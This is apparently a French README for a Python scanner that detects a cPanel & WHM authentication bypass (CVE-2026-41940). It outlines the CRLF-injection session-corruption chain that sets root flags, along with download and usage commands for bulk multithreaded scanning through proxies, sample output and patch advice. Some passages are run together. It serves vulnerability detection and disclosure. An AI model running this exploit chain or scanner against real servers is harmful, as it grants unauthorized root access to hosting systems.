
Scanner pour le contournement d'authentification cPanel & WHM (CVE-2026-41940) qui détecte les versions vulnérables via l'injection CRLF et la manipulation de session, avec prise en charge du multi-threading et des proxys.
Scanner de contournement d'authentification CVE-2026-41940 cPanel & WHM
Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'utilisateur doit se conformer aux lois et réglementations locales ; il est strictement interdit de scanner des systèmes non autorisés. L'auteur décline toute responsabilité en cas d'utilisation abusive.
| Élément | Détails |
|---|
| ID CVE | CVE-2026-41940 |
| Nom de la vulnérabilité | Injection CRLF dans le fichier de session cPanel & WHM |
| Niveau de gravité | 🔴 CRITIQUE (CVSS 9.8) |
| Versions affectées | cPanel & WHM < 11.110.0.97 / 11.118.0.63 / 11.126.0.54 / 11.132.0.29 / 11.134.0.20 / 11.136.0.5 |
| Type de vulnérabilité | Contournement d'authentification → Obtention des privilèges root |
| Difficulté d'exploitation | Faible |
cPanel & WHM présente un défaut logique lors du traitement des fichiers de session :
saveSession() appelle filter_sessiondata() après l'écriture du fichier de sessionAuthorization: Basic contenant une injection CRLFhasroot=1, tfa_verified=1✅ Détection précise - Reproduit rigoureusement la chaîne d'exploitation d'origine
✅ Aucune dépendance - Utilise uniquement la bibliothèque standard de Python
✅ Multithread - Prend en charge l'analyse par lots
✅ Support proxy - Compatible avec Burp Suite/Owasp ZAP
✅ Analyse intelligente - Complète automatiquement le protocole et le port
✅ Sortie surlignée - Résultats de vulnérabilité affichés en rouge bien visible
[1] POST /login/?login_only=1 → Obtention d'une session de pré-authentification
[2] GET / + injection CRLF → Corruption du fichier de session
[3] GET /scripts2/listaccts → Déclenchement du rafraîchissement du cache
[4] GET /cpsess/token/json-api/version → Vérification des privilèges root
wget https://github.com/iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass/blob/main/cPanel-WHM-CVE-2026-41940-AuthBypass.py
chmod +x cPanel-WHM-CVE-2026-41940-AuthBypass.py
# Complétion automatique de https://
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087
# Spécification d'une URL complète
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u https://example.com:2087
# Lecture des cibles depuis un fichier
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt -t 20
# Format de targets.txt :
# 1.2.3.4:2087
# example.com:2087
# https://test.com:2087
# Utilisation d'un proxy HTTP
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087 --proxy http://127.0.0.1:8080
# Analyse par lots via proxy
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt --proxy http://127.0.0.1:8080 -t 5
| Paramètre | Description | Exemple |
|---|---|---|
-u, --url | Cible unique | -u 1.2.3.4:2087 |
-f, --file | Fichier de liste de cibles | -f targets.txt |
-t, --threads | Nombre de threads (défaut 10) | -t 20 |
--timeout | Délai d'expiration (défaut 10 secondes) | --timeout 15 |
--proxy | Proxy HTTP/HTTPS | --proxy http://127.0.0.1:8080 |
13:45:01 [SCAN] Testing 1.2.3.4:2087
13:45:02 [INFO] Got session: 9f3a2c1b8d...
13:45:02 [INFO] Got token: /cpsess1234567890
13:45:03 [VULN] CVE-2026-41940 CONFIRMED! 1.2.3.4:2087

13:46:01 [SCAN] Testing 5.6.7.8:2087
13:46:02 [ERR ] Failed to get session 5.6.7.8:2087
Le script confirme la vulnérabilité selon la logique suivante :
whostmgrsession/cpsess{digit}/json-api/version renvoie 200 et contient le champ "version"⚠️ Remarque : Certaines cibles peuvent renvoyer 500/503 et afficher "License", ce qui indique toujours un contournement d'authentification réussi, mais simplement l'absence de licence commerciale.
Mettez à niveau immédiatement vers les versions sécurisées suivantes :
Mesures d'atténuation temporaires :
/var/cpanel/sessions/Cet outil est destiné uniquement aux tests de sécurité autorisés et à la recherche défensive. Toute analyse non autorisée est illégale et engage la responsabilité de son auteur.
Star ⭐ ce projet pour obtenir plus de mises à jour d'outils de sécurité !